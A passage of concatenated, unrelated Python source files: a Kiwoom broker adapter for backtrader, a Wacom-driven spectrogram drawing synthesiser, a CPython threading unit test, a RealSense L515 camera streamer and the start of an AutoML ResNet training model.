kwargs = {'q': q, 'dataname': dataname, 'tmout': tmout}
t = threading.Thread(target=self._t_streaming_prices, kwargs=kwargs)
t.daemon = True
t.start()
return q
def _t_streaming_prices(self, dataname, q, tmout):
if tmout is not None:
time.sleep(tmout)
streamer = KiwoomOpenApiEventStreamer(self.context, q)
streamer.rates(dataname)
def get_cash(self):
return self._cash
def get_value(self):
return self._value
def get_positions(self):
try:
positions = self.context.get_positions(self.p.account)
except KiwoomOpenApiError:
return None
poslist = positions.get('positions', [])
return poslist
def broker_threads(self):
self.q_account = queue.Queue()
self.q_account.put(True) # force an immediate update
t = threading.Thread(target=self._t_account)
t.daemon = True
t.start()
self.q_ordercreate = queue.Queue()
t = threading.Thread(target=self._t_order_create)
t.daemon = True
t.start()
self.q_orderclose = queue.Queue()
t = threading.Thread(target=self._t_order_cancel)
t.daemon = True
t.start()
# Wait once for the values to be set
self._evt_acct.wait(self.p.account_tmout)
def _t_account(self):
while True:
try:
msg = self.q_account.get(timeout=self.p.account_tmout)
if msg is None:
break # end of thread
except queue.Empty: # tmout -> time to refresh
pass
try:
accinfo = self.context.get_account(self.p.account)
except Exception as e: # pylint: disable=broad-except
self.put_notification(e)
continue
try:
self._cash = accinfo['marginAvail']
self._value = accinfo['balance']
except KeyError:
pass
self._evt_acct.set()
# from below, it's related to processing orders
_ORDEREXECS = {
bt.Order.Market: 'market',
bt.Order.Limit: 'limit',
bt.Order.Stop: 'stop',
bt.Order.StopLimit: 'stop',
}
def order_create(self, order, stopside=None, takeside=None, **kwargs):
okwargs = dict()
okwargs['instrument'] = order.data._dataname
okwargs['units'] = abs(order.created.size)
okwargs['side'] = 'buy' if order.isbuy() else 'sell'
okwargs['type'] = self._ORDEREXECS[order.exectype]
if order.exectype != bt.Order.Market:
okwargs['price'] = order.created.price
if order.valid is None:
# 1 year and datetime.max fail ... 1 month works
valid = datetime.datetime.utcnow() + datetime.timedelta(days=30)
else:
valid = order.data.num2date(order.valid)
# To timestamp with seconds precision
okwargs['expiry'] = int((valid - self._DTEPOCH).total_seconds())
if order.exectype == bt.Order.StopLimit:
okwargs['lowerBound'] = order.created.pricelimit
okwargs['upperBound'] = order.created.pricelimit
if order.exectype == bt.Order.StopTrail:
okwargs['trailingStop'] = order.trailamount
if stopside is not None:
okwargs['stopLoss'] = stopside.price
if takeside is not None:
okwargs['takeProfit'] = takeside.price
okwargs.update(**kwargs) # anything from the user
self.q_ordercreate.put((order.ref, okwargs,))
return order
_OIDSINGLE = ['orderOpened', 'tradeOpened', 'tradeReduced']
_OIDMULTIPLE = ['tradesClosed']
def _t_order_create(self):
while True:
msg = self.q_ordercreate.get()
if msg is None:
break
oref, okwargs = msg
try:
o = self.context.create_order(self.p.account, **okwargs)
except Exception as e:
self.put_notification(e)
self.broker._reject(oref)
return
# Ids are delivered in different fields and all must be fetched to
# match them (as executions) to the order generated here
oids = list()
for oidfield in self._OIDSINGLE:
if oidfield in o and 'id' in o[oidfield]:
oids.append(o[oidfield]['id'])
for oidfield in self._OIDMULTIPLE:
if oidfield in o:
for suboidfield in o[oidfield]:
oids.append(suboidfield['id'])
if not oids:
self.broker._reject(oref)
return
self._orders[oref] = oids[0]
self.broker._submit(oref)
if okwargs['type'] == 'market':
self.broker._accept(oref) # taken immediately
for oid in oids:
self._ordersrev[oid] = oref # maps ids to backtrader order
# An transaction may have happened and was stored
tpending = self._transpend[oid]
tpending.append(None) # eom marker
while True:
trans = tpending.popleft()
if trans is None:
break
self._process_transaction(oid, trans)
def order_cancel(self, order):
self.q_orderclose.put(order.ref)
return order
def _t_order_cancel(self):
while True:
oref = self.q_orderclose.get()
if oref is None:
break
oid = self._orders.get(oref, None)
if oid is None:
continue # the order is no longer there
try:
o = self.context.close_order(self.p.account, oid)
except Exception as e:
continue # not cancelled - FIXME: notify
self.broker._cancel(oref)
_X_ORDER_CREATE = ('STOP_ORDER_CREATE',
'LIMIT_ORDER_CREATE', 'MARKET_IF_TOUCHED_ORDER_CREATE',)
def _transaction(self, trans):
# Invoked from Streaming Events. May actually receive an event for an
# oid which has not yet been returned after creating an order. Hence
# store if not yet seen, else forward to processer
ttype = trans['type']
if ttype == 'MARKET_ORDER_CREATE':
try:
oid = trans['tradeReduced']['id']
except KeyError:
try:
oid = trans['tradeOpened']['id']
except KeyError:
return # cannot do anything else
elif ttype in self._X_ORDER_CREATE:
oid = trans['id']
elif ttype == 'ORDER_FILLED':
oid = trans['orderId']
elif ttype == 'ORDER_CANCEL':
oid = trans['orderId']
elif ttype == 'TRADE_CLOSE':
oid = trans['id']
pid = trans['tradeId']
if pid in self._orders and False: # Know nothing about trade
return # can do nothing
# Skip above - at the moment do nothing
# Received directly from an event in the WebGUI for example which
# closes an existing position related to order with id -> pid
# COULD BE DONE: Generate a fake counter order to gracefully
# close the existing position
msg = ('Received TRADE_CLOSE for unknown order, possibly generated'
' over a different client or GUI')
self.put_notification(msg, trans)
return
else: # Go aways gracefully
try:
oid = trans['id']
except KeyError:
oid = 'None'
msg = 'Received {} with oid {}. Unknown situation'
msg = msg.format(ttype, oid)
self.put_notification(msg, trans)
return
try:
oref = self._ordersrev[oid]
self._process_transaction(oid, trans)
except KeyError: # not yet seen, keep as pending
self._transpend[oid].append(trans)
_X_ORDER_FILLED = ('MARKET_ORDER_CREATE',
'ORDER_FILLED', 'TAKE_PROFIT_FILLED',
'STOP_LOSS_FILLED', 'TRAILING_STOP_FILLED',)
def _process_transaction(self, oid, trans):
try:
oref = self._ordersrev.pop(oid)
except KeyError:
return
ttype = trans['type']
if ttype in self._X_ORDER_FILLED:
size = trans['units']
if trans['side'] == 'sell':
size = -size
price = trans['price']
self.broker._fill(oref, size, price, ttype=ttype)
elif ttype in self._X_ORDER_CREATE:
self.broker._accept(oref)
self._ordersrev[oid] = oref
elif ttype in 'ORDER_CANCEL':
reason = trans['reason']
if reason == 'ORDER_FILLED':
pass # individual execs have done the job
elif reason == 'TIME_IN_FORCE_EXPIRED':
self.broker._expire(oref)
elif reason == 'CLIENT_REQUEST':
self.broker._cancel(oref)
else: # default action ... if nothing else
self.broker._reject(oref)
|
dessin.py
|
import pygame
from bisect import bisect_left
from PIL import Image
from bresenham import bresenham
import numpy as np
import delegator
import math
from threading import Thread
from subprocess import Popen, PIPE
from pyo import *
from time import time
from collections import namedtuple
class WacomValues:
def __init__(self):
"docstring"
self.tilt_x = 0
self.tilt_y = 0
self.pressure = 0
self.thread = Thread(target=lambda : self.update_wacom_stuff())
self.thread.start()
def update_wacom_stuff(self):
libin = Popen(["unbuffer", "libinput", "debug-events"], stdout=PIPE)
while True:
l = libin.stdout.readline().decode("utf-8")
# tilt 3
# pressure 4
try:
if "TABLET_TOOL" in l:
self.tilt_x, self.tilt_y = [min(max((float(num.strip())+60)/120, -1.0), 1.0) for num in l.split("\t")[3].split("tilt:")[1].replace("*","").split("/")]
if "pressure" in l:
self.pressure = float(l.split("\t")[4].split("pressure:")[1].split(" ")[1].replace("*",""))
except:
pass
class Brush:
def preview(self, points):
pyo_sine_pan.setPan(points[0].pan)
for point in points:
faderidx = int((1-point.y)*current_surface.get_height()*preview_quality_factor)
if faderidx < len(pyo_sine_faders):
fader = pyo_sine_faders[faderidx]
fader.mul = fader_loudness*(float(point.amp))
fader.play()
class PixelBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
points = [Point(y, 1, x)]
current_spec_unit.modify_or_insert_line(points, x)
class HarmonicBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
points = [Point(y, 1, x)]
ratio = 2
bandwidth = math.log(max_freq/min_freq,2)
next_y = (bandwidth*y - math.log(ratio,2)) / bandwidth
while next_y > 0 and ratio < 12:
points.append(Point(next_y, 1/(ratio/1.5), x))
ratio+=1
next_y = (bandwidth*y - math.log(ratio,2)) / bandwidth
current_spec_unit.modify_or_insert_line(points, x)
class WSampleLoopBrush(Brush):
def __init__(self):
loadt = Thread(target=lambda:self.load())
loadt.start()
def load(self):
self.loaded = False
bpo = (current_surface.get_height()-1)/math.log(max_freq/min_freq,2)
self.sndTable = SndTable('sample.wav')
delegator.run("arss sample.wav sample.bmp --min-freq {} --max-freq {} --pps 150 --bpo {}".format(min_freq, max_freq, bpo))
self.sample = np.asarray(Image.open("sample.bmp"))
self.idx = 0
print("loaded")
self.loaded = True
def preview(self, offset):
if pyo_sample_reader.table != self.sndTable:
pyo_sample_reader.setTable(self.sndTable)
pyo_sample_reader.setFreq(self.sndTable.getRate())
# number of octaves
bandwidth = math.log(max_freq/min_freq,2)
# number of semitones in the bandwidth
note_num = bandwidth*12
transpo = offset * note_num
pyo_sample_transpo.setTranspo(transpo)
pyo_sample_fader.mul = wacom.pressure
pyo_sample_reader.setPhase(self.idx/len(self.sample[0]))
pyo_sample_pan.setPan(wacom.tilt_x)
pyo_sample_fader.play()
def draw(self, x, y):
if not self.loaded:
return
x = x/current_surface.get_width()
offset = y/current_surface.get_height() - 0.5
increment = 1/current_surface.get_height()
points = []
for i in range(len(self.sample)):
pointy = i * increment + offset
if wacom.pressure * (self.sample[i][self.idx][0]) <=3:
continue
if pointy >= 1 or pointy < 0:
continue
points.append(Point(pointy, wacom.pressure * (self.sample[i][self.idx][0])/255, wacom.tilt_x))
# advance one point in the self.sample and loop
self.preview((1 - y/current_surface.get_height())-0.5)
current_spec_unit.modify_or_insert_line(points, x)
self.idx+=1
self.idx%=len(self.sample[0])
class WHarmonicBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
points = [Point(y, wacom.pressure, wacom.tilt_x)]
ratio = 2
# frequency bandwidth in number of octaves
bandwidth = math.log(max_freq/min_freq,2)
next_y = (bandwidth*y - math.log(ratio,2)) / bandwidth
while next_y > 0 and ratio < 12:
multip = 1
if ratio %2 == 0:
multip = wacom.tilt_y * 2
else:
multip = (1 - wacom.tilt_y) * 2
amp = wacom.pressure/max(((ratio/1.5) * multip),1)
points.append(Point(next_y, amp, wacom.tilt_x))
ratio+=1
next_y = (bandwidth*y - math.log(ratio,2)) / bandwidth
self.preview(points)
current_spec_unit.modify_or_insert_line(points, x)
class WSineBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
points = [Point(y, wacom.pressure, wacom.tilt_x)]
self.preview(points)
current_spec_unit.modify_or_insert_line(points, x)
class WNoiseBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
increment = 1/current_surface.get_height()
points = []
h = int(wacom.tilt_y*(current_surface.get_height()/3))
highest = 1 - max(y - (h*increment),0)
lowest = 1 - min(y + (h*increment),1)
for i in range(-h,h+1):
points.append(Point(min(max(y+i*increment, 0), 1 - increment), wacom.pressure, wacom.tilt_x))
self.preview(highest, lowest, wacom.pressure, wacom.tilt_x)
current_spec_unit.modify_or_insert_line(points, x)
def preview(self, highest, lowest, amp, pan):
# number of octaves
bandwidth = math.log(max_freq/min_freq,2)
# number of midi note in the bandwidth
note_num = bandwidth*12
# the target midi note is the normalized location in y + the base midi note offset
highest * bandwidth
pyo_noise_hp.setFreq(midi_to_freq((note_num * lowest) + freq_to_midi(min_freq)))
pyo_noise_lp.setFreq(midi_to_freq((note_num * highest) + freq_to_midi(min_freq)))
pyo_noise_pan.setPan(pan)
pyo_noise_fader.mul = amp
pyo_noise_fader.play()
class NoiseBrush(Brush):
def draw(self, x, y):
x = x/current_surface.get_width()
y = y/current_surface.get_height()
increment = 1/current_surface.get_height()
points = []
for i in range(-10,11):
points.append(Point(y+i*increment, 1, x))
current_spec_unit.modify_or_insert_line(points, x)
class Point:
def __init__(self, y, amp, pan):
self.y = y
self.amp = amp
self.pan = pan
self.dirty = True
self.gesture_id = current_gesture
def render(self, x_value):
if not self.dirty:
return
self.dirty = False
y_value = round(self.y * current_surface.get_height())
l_amp, r_amp = [self.amp * math.sin(self.pan*math.pi/2), self.amp * math.cos(self.pan*math.pi/2)]
pixel_color = [l_amp*255,0 , r_amp*255]
canvas_l[y_value][x_value] += pixel_color[2]
canvas_l[y_value][x_value] = min(canvas_l[y_value][x_value], 255)
canvas_r[y_value][x_value] += pixel_color[0]
canvas_r[y_value][x_value] = min(canvas_r[y_value][x_value], 255)
try:
current_surface.fill([canvas_r[y_value][x_value],0,canvas_l[y_value][x_value]], ((x_value,y_value),(1,1)))
except:
pass
class Line:
def __init__(self, x, width):
self.x = x
self.width = 1
self.points = []
self.points_y = []
self.dirty = True
self.gesture_id = current_gesture
def render(self):
if not self.dirty:
return
self.dirty = False
x_value = round(self.x * current_surface.get_width())
for point in self.points:
point.render(x_value)
def add_point(self, point):
self.dirty = True
idx = bisect_left(self.points_y, point.y)
adjacent_point = self.points[idx] if idx < len(self.points) else None
if adjacent_point and adjacent_point.y == point.y:
adjacent_point.pan = point.pan
adjacent_point.amp = point.amp
adjacent_point.dirty = True
else:
self.points.insert(idx, point)
self.points_y.insert(idx, point.y)
def add_points(self, points):
for point in points:
self.add_point(point)
class SpectrumUnit:
def __init__(self):
self.lines = []
# keeping this alows us to not build this list every time we need to bissect
self.lines_x = []
def modify_or_insert_line(self, points, x):
line = None
# right now, can only add one line at a time
idx = bisect_left(self.lines_x, x)
adjacent_line = self.lines[idx] if idx < len(self.lines) else None
if adjacent_line and adjacent_line.x == x:
line = adjacent_line
else:
line = Line(x, 1/current_surface.get_width())
self.lines.insert(idx, line)
self.lines_x.insert(idx, x)
line.add_points(points)
def invalidate_canvas(self):
global canvas_l
global canvas_r
canvas_l = [[0 for i in range(w)] for i in range(h)]
canvas_r = [[0 for i in range(w)] for i in range(h)]
current_surface.fill([0,0,0])
for line in self.lines:
line.dirty = True
for point in line.points:
point.dirty = True
def remove_last_gesture(self):
gesture_to_remove = gesture_stack.pop()
for line in self.lines:
line.points = [point for point in line.points if point.gesture_id != gesture_to_remove]
self.invalidate_canvas()
h = 1000
w = 1800
max_freq = 20000
min_freq = 27.5
canvas_l = [[0 for i in range(w)] for i in range(h)]
canvas_r = [[0 for i in range(w)] for i in range(h)]
gesture_stack = []
current_spec_unit = SpectrumUnit()
current_surface = None
current_brush = None
wacom = WacomValues()
current_gesture = 0
pyo_server = Server(audio="jack").boot()
pyo_server.start()
def midi_to_freq(note_num):
return (440 / 32) * (2 ** ((note_num - 9) / 12))
def freq_to_midi(freq):
return math.log(freq/440.0,2) * 12 + 69
preview_quality_factor = 0.3
bpo = ((preview_quality_factor*h)-1)/math.log(max_freq/min_freq,2)
midi_notes_increment = 12/bpo
fader_loudness = 0.1
pyo_sine_faders = [Fader(fadeout=0.03, dur=0.04, mul=fader_loudness) for i in range(int(h*preview_quality_factor))]
pyo_sines = FastSine(mul=pyo_sine_faders,freq=[midi_to_freq(freq_to_midi(min_freq)+i*midi_notes_increment) for i in range(int(h*preview_quality_factor))])
pyo_sine_pan = Pan(pyo_sines).out()
pyo_noise_fader = Fader(fadeout=0.03, dur=0.04, mul=1)
pyo_noise = Noise(mul=pyo_noise_fader)
pyo_noise_hp = Biquadx(pyo_noise, q=1, type=1)
pyo_noise_lp = Biquadx(pyo_noise_hp, q=1)
pyo_noise_pan = Pan(pyo_noise_lp).out()
pyo_sample_fader = Fader(fadeout=0.03, dur=0.04, mul=1)
pyo_sample_reader = Osc(HarmTable([1]), mul=pyo_sample_fader)
pyo_sample_transpo = Harmonizer(pyo_sample_reader, transpo=0, winsize=0.03)
pyo_sample_pan = Pan(pyo_sample_transpo).out()
last_grid_len = 33
grid_len = 33
def main():
global last_grid_len
global grid_len
pressing = False
pygame.init()
pygame.display.set_caption("dessin")
global current_gesture
screen = pygame.display.set_mode((w,h))
global current_surface
current_surface = screen
brushes = [WSineBrush(), WHarmonicBrush(), WNoiseBrush(), WSampleLoopBrush()]
current_brush = brushes[0]
last_mouse_pos = None
running = True
framenum=0
ctrl= False
playing_start = False
playing = False
last_x = 0
grid_changed = True
while running:
for line in current_spec_unit.lines:
line.render()
if grid_changed:
for i in range(int(current_surface.get_width()/last_grid_len)):
current_surface.fill([0,40,0,0.1], ((i * last_grid_len,0),(1,current_surface.get_height())), pygame.BLEND_RGBA_SUB)
for i in range(int(current_surface.get_width()/grid_len)):
current_surface.fill([0,40,0,0.1], ((i * grid_len,0),(1,current_surface.get_height())), pygame.BLEND_RGBA_ADD)
last_grid_len = grid_len
grid_changed = False
if playing:
num_seconds = current_surface.get_width()/150
x = int(((playing-playing_start)/num_seconds) * current_surface.get_width())
if x >= current_surface.get_width():
playing = False
playing_start = False
last_x=0
current_surface.fill([0,100,0,0.3], ((x - (x-last_x),0),(x-last_x,current_surface.get_height())), pygame.BLEND_RGBA_SUB)
continue
if x-last_x >=1:
current_surface.fill([0,100,0,0.3], ((x - (x-last_x),0),(x-last_x,current_surface.get_height())), pygame.BLEND_RGBA_ADD)
playing = time()
last_x = x
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if event.type == pygame.MOUSEBUTTONUP:
pressing = False
gesture_stack.append(current_gesture)
current_gesture += 1
last_mouse_pos = None
grid_changed = True
if event.type == pygame.MOUSEBUTTONDOWN:
pressing = True
last_mouse_pos = [-1,-1]
if event.type == pygame.MOUSEMOTION and pressing:
if last_mouse_pos != [-1,-1]:
points = bresenham(last_mouse_pos[0], last_mouse_pos[1], event.pos[0], event.pos[1])
else:
points = [[event.pos[0], event.pos[1]]]
for p in list(points)[0:-1]:
current_brush.draw(p[0], p[1])
last_mouse_pos = event.pos
if event.type == pygame.KEYDOWN:
num = -1
try:
num = int(event.unicode)
except:
pass
if num > -1:
current_brush = brushes[num-1]
elif event.key == 122 and pygame.key.get_mods() & pygame.KMOD_CTRL:
current_spec_unit.remove_last_gesture()
elif event.unicode == "+":
last_grid_len = grid_len
grid_len += 1
grid_changed = True
elif event.unicode == "-":
last_grid_len = grid_len
grid_len -= 1
grid_changed = True
elif event.unicode == " ":
if playing:
continue
il = Image.fromarray(np.asarray(canvas_l, np.dtype('uint8')))
il.convert("RGB").save("out_l.bmp")
ir = Image.fromarray(np.asarray(canvas_r, np.dtype('uint8')))
ir.convert("RGB").save("out_r.bmp")
delegator.run("arss out_l.bmp o_l.wav --sine --min-freq 27.5 --max-freq 20000 -r 44000 -f 16 --pps 150")
delegator.run("arss out_r.bmp o_r.wav --sine --min-freq 27.5 --max-freq 20000 -r 44000 -f 16 --pps 150")
delegator.run("sox o_l.wav o_r.wav --channels 2 --combine merge o.wav")
delegator.run("play o.wav", block=False)
playing_start = time()
playing = time()
pygame.display.update()
if __name__=="__main__":
main()
|
test_threading.py
|
# Very rudimentary test of threading module
import test.test_support
from test.test_support import verbose
import random
import sys
import threading
import thread
import time
import unittest
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() * 2
if verbose:
print 'task', self.getName(), 'will run for', delay, 'sec'
self.sema.acquire()
self.mutex.acquire()
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
self.mutex.release()
time.sleep(delay)
if verbose:
print 'task', self.getName(), 'done'
self.mutex.acquire()
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print self.getName(), 'is finished.', self.nrunning.get(), \
'tasks are running'
self.mutex.release()
self.sema.release()
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.isAlive())
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Acquiring an RLock forces an entry for the foreign
# thread to get made in the threading._active map.
r = threading.RLock()
r.acquire()
r.release()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
@test.test_support.impl_detail(msg="relies on ctypes access to CPython C API")
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.setDaemon(True) # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
for i in xrange(1, 1000):
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
def test_main():
test.test_support.run_unittest(ThreadTests)
if __name__ == "__main__":
test_main()
|
l500.py
|
## License: Apache 2.0. See LICENSE file in root directory.
## Copyright(c) 2015-2017 Intel Corporation. All Rights Reserved.
###############################################
## Open CV and Numpy integration ##
###############################################
import pyrealsense2 as rs
import numpy as np
import cv2
import sys
import threading
import time
class L515():
def __init__(self):
# 初始化
self.pipeline = rs.pipeline()
self.config = rs.config()
# 開啟攝影機並允許串流
self.config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)
# self.config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)
self.config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)
self.profile = self.pipeline.start(self.config)
#
self.stream = threading.Thread(target=self.update_frame)
self.flag = 1
# rs.align 讓 深度圖像 跟 其他圖像 對齊
align_to = rs.stream.color
self.align = rs.align(align_to)
# 存放影像的變數
self.depth_frame, self.color_frame = [], []
self.depth_numpy, self.color_numpy = [], []
self.depth_image, self.color_image = [], []
def update_frame(self):
### 01 ###
while self.flag:
### 02 ###
frames = self.pipeline.wait_for_frames()
aligned_frames = self.align.process(frames)
self.depth_frame = aligned_frames.get_depth_frame()
self.color_frame = aligned_frames.get_color_frame()
if not self.depth_frame or not self.color_frame: return None
### 03 ###
# convert to cv2 from pipeline
self.color_numpy = np.asanyarray(self.color_frame.get_data())
self.depth_numpy = np.asanyarray(self.depth_frame.get_data())
# 統一用法,雖然浪費資源但是能夠統一用法
self.color_image = self.color_numpy
self.depth_image = cv2.applyColorMap(cv2.convertScaleAbs(self.depth_numpy, alpha=0.03), cv2.COLORMAP_JET)
def get_depth(self, x, y):
return self.depth_frame.get_distance(x,y)
def clipping_bg(self, clip_distance=1, bg_color=153):
# 將 公尺資訊 轉換成 RealSense 的 深度單位
depth_sensor = self.profile.get_device().first_depth_sensor()
depth_scale = depth_sensor.get_depth_scale()
# 去背距離、背景顏色
clipping_distance = (clip_distance / depth_scale)
bg_color = bg_color
# 取得前景
depth_image_3d = np.dstack((self.depth_numpy, self.depth_numpy, self.depth_numpy))
bg_removed = np.where((depth_image_3d > clipping_distance) | (depth_image_3d <= 0), bg_color, self.color_numpy)
return bg_removed
def start_stream(self):
print(f"Start Stream ... " , end='\n')
self.stream.start()
time.sleep(1)
def stop_stream(self):
print("Stop Stream ...")
self.flag = 0
print("Clean RS Camera")
self.pipeline.stop()
if not self.stream.is_alive(): print("Stream Killed")
if __name__ == "__main__":
l515 = L515()
l515.start_stream()
mode = {0:'color', 1:'depth'}
while True:
frame = l515.color_image if mode=='color' else l515.depth_image
cv2.imshow('Test', frame)
key = cv2.waitKey(1)
if key==ord('q'): break
elif key==ord(' '): mode = not mode
else: continue
l515.stop_stream()
|
model.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import threading
import tensorflow as tf
import torch
import torchvision as tv
import numpy as np
import skeleton
from architectures.resnet import ResNet18
from skeleton.projects import LogicModel, get_logger
from skeleton.projects.others import NBAC, AUC
torch.backends.cudnn.benchmark = True
threads = [
threading.Thread(target=lambda: torch.cuda.synchronize()),
threading.Thread(target=lambda: tf.Session())
]
[t.start() for t in threads]
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
LOGGER = get_logger(__name__)
class Model(LogicModel):
def __init__(self, metadata):
super(Model, self).__init__(metadata)
self.use_test_time_augmentation = False
def build(self):
base_dir = os.path.dirname(os.path.abspath(__file__))
in_channels = self.info['dataset']['shape'][-1]
num_class = self.info['dataset']['num_class']
# torch.cuda.synchronize()
LOGGER.info('[init] session')
[t.join() for t in threads]
self.device = torch.device('cuda', 0)
self.session = tf.Session()
LOGGER.info('[init] Model')
Network = ResNet18 # ResNet18 # BasicNet, SENet18, ResNet18
self.model = Network(in_channels, num_class)
self.model_pred = Network(in_channels, num_class).eval()
# torch.cuda.synchronize()
LOGGER.info('[init] weight initialize')
if Network in [ResNet18]:
model_path = os.path.join(base_dir, 'models')
LOGGER.info('model path: %s', model_path)
self.model.init(model_dir=model_path, gain=1.0)
else:
self.model.init(gain=1.0)
# torch.cuda.synchronize()
LOGGER.info('[init] copy to device')
self.model = self.model.to(device=self.device).half()
self.model_pred = self.model_pred.to(device=self.device).half()
self.is_half = self.model._half
# torch.cuda.synchronize()
LOGGER.info('[init] done.')
def update_model(self):
num_class = self.info['dataset']['num_class']
epsilon = min(0.1, max(0.001, 0.001 * pow(num_class / 10, 2)))
if self.is_multiclass():
self.model.loss_fn = torch.nn.BCEWithLogitsLoss(reduction='none')
# self.model.loss_fn = skeleton.nn.BinaryCrossEntropyLabelSmooth(num_class, epsilon=epsilon, reduction='none')
self.tau = 8.0
LOGGER.info('[update_model] %s (tau:%f, epsilon:%f)', self.model.loss_fn.__class__.__name__, self.tau, epsilon)
else:
self.model.loss_fn = torch.nn.CrossEntropyLoss(reduction='none')
# self.model.loss_fn = skeleton.nn.CrossEntropyLabelSmooth(num_class, epsilon=epsilon)
self.tau = 8.0
LOGGER.info('[update_model] %s (tau:%f, epsilon:%f)', self.model.loss_fn.__class__.__name__, self.tau, epsilon)
self.model_pred.loss_fn = self.model.loss_fn
self.init_opt()
LOGGER.info('[update] done.')
def init_opt(self):
steps_per_epoch = self.hyper_params['dataset']['steps_per_epoch']
batch_size = self.hyper_params['dataset']['batch_size']
params = [p for p in self.model.parameters() if p.requires_grad]
warmup_multiplier = 2.0
lr_multiplier = max(1.0, batch_size / 32)
scheduler_lr = skeleton.optim.gradual_warm_up(
skeleton.optim.get_reduce_on_plateau_scheduler(
0.025 * lr_multiplier / warmup_multiplier,
patience=10, factor=.5, metric_name='train_loss'
),
warm_up_epoch=5,
multiplier=warmup_multiplier
)
self.optimizer = skeleton.optim.ScheduledOptimizer(
params,
torch.optim.SGD,
# skeleton.optim.SGDW,
steps_per_epoch=steps_per_epoch,
clip_grad_max_norm=None,
lr=scheduler_lr,
momentum=0.9,
weight_decay=0.001 * 1 / 4,
nesterov=True
)
LOGGER.info('[optimizer] %s (batch_size:%d)', self.optimizer._optimizer.__class__.__name__, batch_size)
def adapt(self, remaining_time_budget=None):
epoch = self.info['loop']['epoch']
input_shape = self.hyper_params['dataset']['input']
height, width = input_shape[:2]
batch_size = self.hyper_params['dataset']['batch_size']
train_score = np.average([c['train']['score'] for c in self.checkpoints[-5:]])
valid_score = np.average([c['valid']['score'] for c in self.checkpoints[-5:]])
LOGGER.info('[adapt] [%04d/%04d] train:%.3f valid:%.3f',
epoch, self.hyper_params['dataset']['max_epoch'],
